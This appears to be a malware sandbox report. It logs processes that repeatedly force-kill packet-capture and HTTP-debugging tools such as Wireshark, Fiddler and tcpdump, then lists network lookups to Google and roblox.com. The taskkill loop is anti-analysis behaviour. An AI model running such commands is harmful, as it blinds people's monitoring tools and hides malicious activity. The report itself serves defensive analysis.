C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{4C438DA9-60F5-49AB-A992-C5C0CD23DEDF}\MicrosoftEdge_X64_126.0.2592.61.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{4C438DA9-60F5-49AB-A992-C5C0CD23DEDF}\MicrosoftEdge_X64_126.0.2592.61.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{4C438DA9-60F5-49AB-A992-C5C0CD23DEDF}\EDGEMITMP_4EED9.tmp\setup.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{4C438DA9-60F5-49AB-A992-C5C0CD23DEDF}\EDGEMITMP_4EED9.tmp\setup.exe" --install-archive="C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{4C438DA9-60F5-49AB-A992-C5C0CD23DEDF}\MicrosoftEdge_X64_126.0.2592.61.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --system-level
C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{4C438DA9-60F5-49AB-A992-C5C0CD23DEDF}\EDGEMITMP_4EED9.tmp\setup.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{4C438DA9-60F5-49AB-A992-C5C0CD23DEDF}\EDGEMITMP_4EED9.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\MsEdgeCrashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=126.0.6478.62 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeUpdate\Install\{4C438DA9-60F5-49AB-A992-C5C0CD23DEDF}\EDGEMITMP_4EED9.tmp\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=126.0.2592.61 --initial-client-data=0x22c,0x230,0x234,0x208,0x238,0x7ff708b4aa40,0x7ff708b4aa4c,0x7ff708b4aa58
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 202.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.15.31.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.200.14:443 | apis.google.com | tcp |
| US | 8.8.8.8:53 | 195.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 172.217.169.46:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| US | 8.8.8.8:53 | 46.169.217.172.in-addr.arpa | udp |
| GB | 142.250.187.238:443 | clients2.google.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | roblox.com | udp |
| GB | 128.116.119.4:443 | roblox.com | tcp |
| GB | 128.116.119.4:443 | roblox.com | tcp |
